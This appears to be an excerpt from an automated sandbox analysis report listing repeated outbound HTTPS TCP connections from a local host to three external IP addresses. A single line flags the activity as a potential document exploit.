Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
